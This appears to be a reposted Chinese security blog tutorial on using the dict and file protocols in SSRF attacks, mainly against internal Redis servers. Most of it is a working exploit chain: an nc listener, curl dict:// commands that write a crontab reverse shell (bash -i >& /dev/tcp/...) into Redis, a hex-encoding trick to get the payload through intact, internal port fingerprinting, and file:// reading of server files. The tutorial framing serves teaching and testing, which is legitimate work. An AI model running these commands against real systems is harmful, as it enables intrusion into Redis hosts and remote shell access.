zoukankan      html  css  js  c++  java
  • SSRF漏洞用到的其他协议(dict协议,file协议)

    0x00 引言

    当SSRF打内网reids时,若gopher协议用不了,我们也可以用其他协议

    0x01 dict协议
    一、定义:词典网络协议,在RFC 2009中进行描述。它的目标是超越Webster protocol,并允许客户端在使用过程中访问更多字典。Dict服务器和客户机使用TCP端口2628。(摘自百度百科)
    二、学习参考链接:
    使用 dictd 搭建 DICT 字典服务器
    DICT协议全文
    三、DICT协议在SSRF漏洞中使用
    在SSRF利用中,gopher协议无疑是最好用的,但gopher协议的使用是有一定条件的,如下:

     当gopher协议无法使用时,怎么办?这时候可以使用dict协议,我们先看执行效果:

     由上图可以发现通过dict协议,可以看出目标端口的指纹信息,通过上图返回的指纹信息,可以明确,是6379的redis数据库。OK,现在我们知道,利用dict协议可以探测端口的开放情况和指纹信息,那么dict协议怎么进一步使用?有什么语法?以下为dict协议的使用:

    dict://serverip:port/命令:参数向服务器的端口请求为【命令:参数】,并在末尾自动补上\r\n(CRLF),为漏洞利用增添了便利通过dict协议的话要一条一条的执行,而gopher协议执行一条命令就行了。

    明白利用方法后,我们可以使用dict协议执行命令,例如可以获取redis的变量

    margine:~ margin$ curl dict://192.168.0.67:6379/get:name
    -ERR Syntax error, try CLIENT (LIST | KILL ip:port | GETNAME | SETNAME connection-name)
    $6
    Margin
    +OK

    通过dict协议利用redis的未授权访问反弹shell的步骤如下:
    # 1、开启反弹shell的监听
    nc -l 9999
    # 2、依次执行下面的命令
    curl dict://192.168.0.119:6379/set:mars:"\n\n* * * * * root bash -i >& /dev/tcp/192.168.0.119/9999 0>&1\n\n"
    curl dict://192.168.0.119:6379/config:set:dir:/etc/
    curl dict://192.168.0.119:6379/config:set:dbfilename:crontab
    curl dict://192.168.0.119:6379/bgsave

    执行时,反弹shell的命令,也就是set:mars:xxx,会因为特殊字符的原因无法写入到目标的redis中,被被空格所分割导致出现一下情况:

    1584705879.520734 [0 172.17.0.1:44488] "set" "mars" "\\n\\n*" "*" "*" "*" "*" "root" "bash" "-i" ">&" "/dev/tcp/192.168.0.119/6789" "0>&1\\n\\n"

    根据上图我们会发现,命令被分割了,看表象感觉像是被空格分割了。此时将反弹shell的命令进行十六进制转换,变为:

    curl dict://192.168.0.119:6379/set:mars:\"\\x0a\\x2a\\x20\\x2a\\x20\\x2a\\x20\\x2a\\x20\\x2a\\x20\\x72\\x6f\\x6f\\x74\\x20\\x62\\x61\\x73\\x68\\x20\\x2d\\x69\\x20\\x3e\\x26\\x20\\x2f\\x64\\x65\\x76\\x2f\\x74\\x63\\x70\\x2f\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x30\\x2e\\x31\\x31\\x39\\x2f\\x39\\x39\\x39\\x39\\x20\\x30\\x3e\\x26\\x31\\x0a\"

    以上单引号使用反斜杠\进行转移,其他数据进行十六进制编码,执行结果如下,可以发现没有错误了

    1584706087.980465 [0 172.17.0.1:44490] "set" "mars" "\n* * * * * root bash -i >& /dev/tcp/192.168.0.119/9999 0>&1\n"

    剩下的修改路径和文件名称的请求,正常执行即可

    但很多时候我们利用ssrf漏洞去攻击内网服务器的时候,并不知道内网中有什么样的应用、IP地址是多少、开放了什么端口、端口对应的服务是什么。所以需要先对内网做IP+端口的扫描,如果开放的服务是redis才能使用上文讲到的利用方法,对于不同的应用有不同的扫描方法,例如,redis的扫描可以请求以下内容来根据回显内容进行判断是否为redis,其他的服务也是同样道理,只要知道服务的指纹,然后与自己的指纹库进行比对即可:

    curl dict://192.168.0.119:6379/

    0x02 file协议

    file协议主要用于访问本地计算机中的文件,命令格式为:

    file://文件路径

    使用file协议可以直接读取目标操作系统的文件,例如使用以下方法来读取
    file协议读取文件

     file协议和http协议有什么区别呢?
    (1)file协议主要用于读取服务器本地文件,访问的是本地的静态资源
    (2)http是访问本地的html文件,相当于把本机当作http服务器,通过http访问服务器,服务器再去访问本地资源。简单来说file只能静态读取,http可以动态解析
    (3)http服务器可以开放端口,让他人通过http访问服务器资源,但file不可以
    (4)file对应的类似http的协议是ftp协议(文件传输协议)
    (5)file不能跨域

  • 相关阅读:
    redis配置文件 redis.conf
    CentOS安装 NodeJS 和 NPM
    Docker中运行redis报错误: Failed opening the RDB file root (in server root dir /etc/cron.d) for saving: Permission denied
    AllowControlAllowOrigin:谷歌跨域扩展插件下载
    uniapp 判断客户端环境是安卓还是ios
    Windows环境下查看某个端口被哪个应用程序占用并停止程序
    Oracle数据库快速入门
    Linux 使用vim命令编辑文件内容
    解决VMware Workstation客户机与宿主机无法复制文件和共享剪切板的问题
    Spring 中的事件机制 ApplicationEventPublisher
  • 原文地址:https://www.cnblogs.com/zzjdbk/p/12970919.html
Copyright © 2011-2022 走看看